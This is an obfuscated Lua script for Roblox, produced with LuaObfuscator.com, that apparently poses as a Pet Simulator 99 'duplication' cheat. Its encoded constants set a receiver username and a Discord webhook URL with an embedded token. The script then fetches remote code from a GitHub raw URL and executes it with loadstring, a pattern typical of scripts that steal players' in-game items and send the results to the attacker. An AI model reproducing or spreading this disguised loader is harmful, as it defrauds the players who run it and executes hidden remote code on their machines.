--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=0 -0 ;local v32;while true do if (v31==(0 -(931 -(857 + 74)))) then v32=v1(v16,v19,v19);v19=v19 + (1 -0) ;v31=2 -1 ;end if (v31==((1188 -(367 + 201)) -(555 + 64))) then return v32;end end end v23=nil;function v23() local v33=927 -(214 + 713) ;local v34;local v35;while true do if (v33==(1 + 0)) then return (v35 * (41 + 215)) + v34 ;end if (0==v33) then v34,v35=v1(v16,v19,v19 + ((1252 -373) -(282 + 595)) );v19=v19 + (1639 -(1523 + 114)) ;v33=(1066 -(68 + 997)) + 0 ;end end end v18=3;end if (v18==4) then function v25() local v36=1270 -(226 + 1044) ;local v37;local v38;local v39;local v40;local v41;local v42;while true do if (1==v36) then v39=4 -3 ;v40=(v21(v38,118 -(32 + 85) ,20 + 0 ) * (2^(8 + 24))) + v37 ;v36=959 -((2023 -1131) + 65) ;end if (v36==(4 -2)) then v41=v21(v38,21,31);v42=((v21(v38,(126 -68) -26 )==(1 -0)) and  -1) or (351 -(87 + 263)) ;v36=1 + 2 ;end if (v36==(180 -(67 + 113))) then v37=v24();v38=v24();v36=1;end if (v36==(3 + 0)) then if (v41==(0 -0)) then if (v40==(0 + 0)) then return v42 * (0 -0) ;else v41=953 -(802 + 150) ;v39=0 -0 ;end elseif (v41==(3712 -1665)) then return ((v40==((0 -0) + 0)) and (v42 * ((998 -(908 + 7 + (873 -(368 + 423))))/(0 -0)))) or (v42 * NaN) ;end return v8(v42,v41-(596 + (1341 -914)) ) * (v39 + (v40/((2 -0)^(1239 -(1069 + 118))))) ;end end end v26=nil;function v26(v43) local v44;if  not v43 then v43=v24();if (v43==(0 -0)) then return "";end end v44=v3(v16,v19,(v19 + v43) -(19 -(10 + 8)) );v19=v19 + v43 ;local v45={};for v70=3 -2 , #v44 do v45[v70]=v2(v1(v3(v44,v70,v70)));end return v6(v45);end v18=5;end if (v18==6) then v29=nil;function v29() local v46=0;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v46==(1637 -(1373 + 263))) then v49=nil;v50=nil;v46=1002 -(451 + 549) ;end if (v46~=(0 + 0)) then else local v75=0 -0 ;while true do if (v75==1) then v46=1 -0 ;break;end if (v75==0) then v47=0;v48=nil;v75=1385 -(746 + 638) ;end end end if (v46==2) then local v76=0;while true do if (v76==1) then v46=2 + 1 ;break;end if (v76==0) then v51=nil;v52=nil;v76=1;end end end if (v46~=(5 -1)) then else while true do if (v47~=(342 -(218 + 123))) then else v50=nil;v51=nil;v47=2;end if (v47~=2) then else local v100=0;while true do if (v100~=(1582 -(1535 + 46))) then else v47=3;break;end if (v100~=(0 + 0)) then else v52=nil;v53=nil;v100=1;end end end if (v47~=(1 + 2)) then else v54=nil;while true do local v103=560 -(306 + 254) ;while true do if (v103==1) then if (v48==(1 + 1)) then local v109=0;local v110;while true do if (v109~=(0 -0)) then else v110=1467 -(899 + 568) ;while true do local v161=0 + 0 ;while true do if (v161==0) then if (v110~=(0 -0)) then else for v168=604 -(268 + 335) ,v24() do local v169=0;local v170;local v171;local v172;while true do if (v169==(291 -(60 + 230))) then v172=nil;while true do if (v170~=(572 -(426 + 146))) then else local v183=0;while true do if (v183==0) then v171=0 + 0 ;v172=nil;v183=1;end if (v183~=1) then else v170=1;break;end end end if ((1457 -(282 + 1174))==v170) then while true do if (v171~=(811 -(569 + 242))) then else v172=v22();if (v21(v172,2 -1 ,1 + 0 )~=0) then else local v190=1024 -(706 + 318) ;local v191;local v192;local v193;local v194;local v195;while true do if (v190~=0) then else v191=0;v192=nil;v190=1252 -(721 + 530) ;end if (v190==(1273 -(945 + 326))) then v195=nil;while true do if ((2 -1)==v191) then local v200=0 + 0 ;while true do if (v200==1) then v191=702 -(271 + 429) ;break;end if (0~=v200) then else v194=nil;v195=nil;v200=1 + 0 ;end end end if (v191==0) then local v201=1500 -(1408 + 92) ;while true do if (v201~=(1087 -(461 + 625))) then else v191=1;break;end if (0==v201) then v192=1288 -(993 + 295) ;v193=nil;v201=1 + 0 ;end end end if (2==v191) then while true do if (v192==(1174 -(418 + 753))) then if (v21(v194,2 + 1 ,3)==(1 + 0)) then v195[2 + 2 ]=v54[v195[2 + 2 ]];end v49[v168]=v195;break;end if (v192==1) then local v203=0;while true do if (v203==0) then v195={v23(),v23(),nil,nil};if (v193==(0 + 0)) then local v209=1322 -(1249 + 73) ;while true do if (v209==(0 + 0)) then v195[1148 -(466 + 679) ]=v23();v195[4]=v23();break;end end elseif (v193==1) then v195[6 -3 ]=v24();elseif (v193==(5 -3)) then v195[1903 -(106 + 1794) ]=v24() -((1 + 1)^16) ;elseif (v193==3) then local v219=0 + 0 ;local v220;local v221;while true do if (1==v219) then while true do if (v220==0) then v221=0;while true do if (v221==(0 -0)) then v195[3]=v24() -(2^(43 -27)) ;v195[4]=v23();break;end end break;end end break;end if (v219~=(114 -(4 + 110))) then else local v222=584 -(57 + 527) ;while true do if (v222==1) then v219=1;break;end if (v222~=(1427 -(41 + 1386))) then else v220=103 -(17 + 86) ;v221=nil;v222=1;end end end end end v203=1 + 0 ;end if ((1 -0)~=v203) then else v192=5 -3 ;break;end end end if ((168 -(122 + 44))==v192) then local v204=0;while true do if (1~=v204) then else v192=3;break;end if ((0 -0)==v204) then if (v21(v194,3 -2 ,1)==(1 + 0)) then v195[2]=v54[v195[1 + 1 ]];end if (v21(v194,3 -1 ,67 -(30 + 35) )==(1 + 0)) then v195[1260 -(1043 + 214) ]=v54[v195[11 -8 ]];end v204=1213 -(323 + 889) ;end end end if (0~=v192) then else local v205=0;local v206;while true do if ((0 -0)~=v205) then else v206=580 -(361 + 219) ;while true do if (v206==(321 -(53 + 267))) then v192=1 + 0 ;break;end if (v206==(413 -(15 + 398))) then local v214=0;while true do if (v214~=1) then else v206=1;break;end if (v214==0) then v193=v21(v172,984 -(18 + 964) ,11 -8 );v194=v21(v172,3 + 1 ,6);v214=1;end end end end break;end end end end break;end end break;end if (v190==1) then v193=nil;v194=nil;v190=2;end end end break;end end break;end end break;end if (v169==(0 + 0)) then v170=850 -(20 + 830) ;v171=nil;v169=1 + 0 ;end end end for v173=1,v24() do v50[v173-(127 -(116 + 10)) ]=v29();end v110=1;end if (v110==1) then return v52;end break;end end end break;end end end break;end if (v103==(0 + 0)) then local v108=0;while true do if (v108==1) then v103=739 -(542 + 196) ;break;end if ((0 -0)==v108) then if (v48==0) then local v131=0 + 0 ;local v132;local v133;while true do if (v131==(1 + 0)) then while true do if (v132==(0 + 0)) then v133=0 -0 ;while true do if (v133~=(0 -0)) then else local v177=0;while true do if (v177==1) then v133=1;break;end if (v177~=(1551 -(1126 + 425))) then else v49={};v50={};v177=406 -(118 + 287) ;end end end if (2==v133) then v48=1;break;end if (v133==1) then local v178=0 -0 ;while true do if (0==v178) then v51={};v52={v49,v50,nil,v51};v178=1122 -(118 + 1003) ;end if (v178~=(2 -1)) then else v133=379 -(142 + 235) ;break;end end end end break;end end break;end if (v131==0) then v132=0 -0 ;v133=nil;v131=1;end end end if (v48==(1 + 0)) then local v134=0;local v135;local v136;while true do if (v134==(977 -(553 + 424))) then v135=0;v136=nil;v134=1 -0 ;end if (v134~=1) then else while true do if (v135~=0) then else v136=0;while true do if (v136==(2 + 0)) then v48=2 + 0 ;break;end if ((1 + 0)==v136) then local v179=0 + 0 ;while true do if (v179~=0) then else local v182=0;while true do if (v182==0) then for v185=1 + 0 ,v53 do local v186=0;local v187;local v188;local v189;while true do if (v186==(0 -0)) then local v196=0;while true do if (0~=v196) then else v187=0 -0 ;v188=nil;v196=1;end if (v196==(2 -1)) then v186=1 + 0 ;break;end end end if (v186~=(4 -3)) then else v189=nil;while true do if (v187==1) then if (v188==1) then v189=v22()~=0 ;elseif (v188==(755 -(239 + 514))) then v189=v25();elseif (v188==3) then v189=v26();end v54[v185]=v189;break;end if (v187==0) then local v198=0 + 0 ;local v199;while true do if (v198~=(1329 -(797 + 532))) then else v199=0;while true do if (1~=v199) then else v187=1 + 0 ;break;end if (v199~=(0 + 0)) then else v188=v22();v189=nil;v199=2 -1 ;end end break;end end end end break;end end end v52[1205 -(373 + 829) ]=v22();v182=732 -(476 + 255) ;end if ((1131 -(369 + 761))==v182) then v179=1;break;end end end if (v179==1) then v136=2 + 0 ;break;end end end if (v136~=(0 -0)) then else local v180=0;local v181;while true do if (v180==0) then v181=0;while true do if (v181~=1) then else v136=1;break;end if (v181==(0 -0)) then v53=v24();v54={};v181=1;end end break;end end end end break;end end break;end end end v108=239 -(64 + 174) ;end end end end end break;end if (v47~=0) then else local v101=0 + 0 ;local v102;while true do if (v101==0) then v102=0;while true do if ((0 -0)==v102) then local v111=336 -(144 + 192) ;while true do if (v111==1) then v102=217 -(42 + 174) ;break;end if (v111~=0) then else v48=0 + 0 ;v49=nil;v111=1;end end end if (v102~=1) then else v47=1;break;end end break;end end end end break;end if (v46==3) then local v77=0 + 0 ;while true do if (v77==(1 + 0)) then v46=1508 -(363 + 1141) ;break;end if (v77==0) then v53=nil;v54=nil;v77=1;end end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v55) if (v1(v55,2)==79) then v20=v0(v3(v55,1,1));return "";else local v72=v2(v0(v55,16));if v20 then local v81=0;local v82;while true do if (v81==1) then return v82;end if (v81==0) then v82=v5(v72,v20);v20=nil;v81=1;end end else return v72;end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v56,v57,v58,v59=v1(v16,v19,v19 + 3 );v19=v19 + (1584 -(1183 + 397)) ;return (v59 * (12298468 + 4478748)) + (v58 * (199514 -133978)) + (v57 * 256) + v56 ;end v25=nil;v18=4;end if (v18==7) then function v30(v60,v61,v62) local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...) local v83=v64;local v84=v65;local v85=v66;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do v95=v83[v87];v96=v95[1];if (v96<=10) then if (v96<=4) then if (v96<=1) then if (v96>0) then v93[v95[2]]=v62[v95[3]];else v93[v95[2]]=v95[3];end elseif (v96<=2) then v62[v95[3]]=v93[v95[2]];elseif (v96>3) then do return;end else v93[v95[2]]=v95[3];end elseif (v96<=7) then if (v96<=5) then v93[v95[2]]();elseif (v96==6) then local v139=0;local v140;local v141;local v142;local v143;while true do if (v139==0) then v140=v95[2];v141,v142=v86(v93[v140](v13(v93,v140 + 1 ,v95[3])));v139=1;end if (v139==2) then for v166=v140,v88 do local v167=0;while true do if (0==v167) then v143=v143 + 1 ;v93[v166]=v141[v143];break;end end end break;end if (v139==1) then v88=(v142 + v140) -1 ;v143=0;v139=2;end end else local v144=v95[2];local v145=v93[v95[3]];v93[v144 + 1 ]=v145;v93[v144]=v145[v95[4]];end elseif (v96<=8) then local v118=0;local v119;while true do if (v118==0) then v119=v95[2];v93[v119]=v93[v119](v13(v93,v119 + 1 ,v88));break;end end elseif (v96==9) then local v149=v95[2];local v150=v93[v95[3]];v93[v149 + 1 ]=v150;v93[v149]=v150[v95[4]];else v87=v95[3];end elseif (v96<=15) then if (v96<=12) then if (v96>11) then local v120=v95[2];local v121,v122=v86(v93[v120](v13(v93,v120 + 1 ,v95[3])));v88=(v122 + v120) -1 ;local v123=0;for v128=v120,v88 do v123=v123 + 1 ;v93[v128]=v121[v123];end else v93[v95[2]]=v62[v95[3]];end elseif (v96<=13) then v93[v95[2]]=v95[3]~=0 ;elseif (v96==14) then do return;end else local v155=v95[2];v93[v155]=v93[v155](v13(v93,v155 + 1 ,v88));end elseif (v96<=18) then if (v96<=16) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96>17) then v93[v95[2]]=v95[3]~=0 ;else v93[v95[2]]();end elseif (v96<=19) then v87=v95[3];elseif (v96>20) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end else v62[v95[3]]=v93[v95[2]];end v87=v87 + 1 ;end end;end if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v67,v68,v69) if v69 then local v73=(v67/(2^(v68-(1976 -(1913 + 62)))))%((2 + (856 -(564 + 292)))^(((v69-(1 -0)) -(v68-(2 -1))) + (1934 -(565 + 1368)))) ;return v73-(v73%(3 -2)) ;else local v74=((5012 -3349) -(1477 + 184))^(v68-(1 -(304 -(244 + 60)))) ;return (((v67%(v74 + v74))>=v74) and (1 + 0)) or 0 ;end end v22=nil;v18=2;end end end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C796865725363726970742F70732O392D6475706C69636174696F6E2F6D61696E2F72656C6561736503083O005265636965766572030A3O0072616E69656C5F6A756403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31322O333634373837353238343739353437332F56525A4D59794C546946495A2D6A5A574C63514C766F6E4F395A6769796D543456627A756F7273526575336E3537737055733034744D67596E48467369437A572O6F683200153O00124O00013O0026103O000C000100020004133O000C000100120B000100033O00120B000200043O00200700020002000500122O000400064O000D000500014O000C000200054O000800013O00022O00050001000100010004133O001400010026103O0001000100010004133O0001000100122O000100083O001202000100073O00122O0001000A3O001202000100093O00124O00023O0004133O000100012O00043O00017O00",v9(),...);
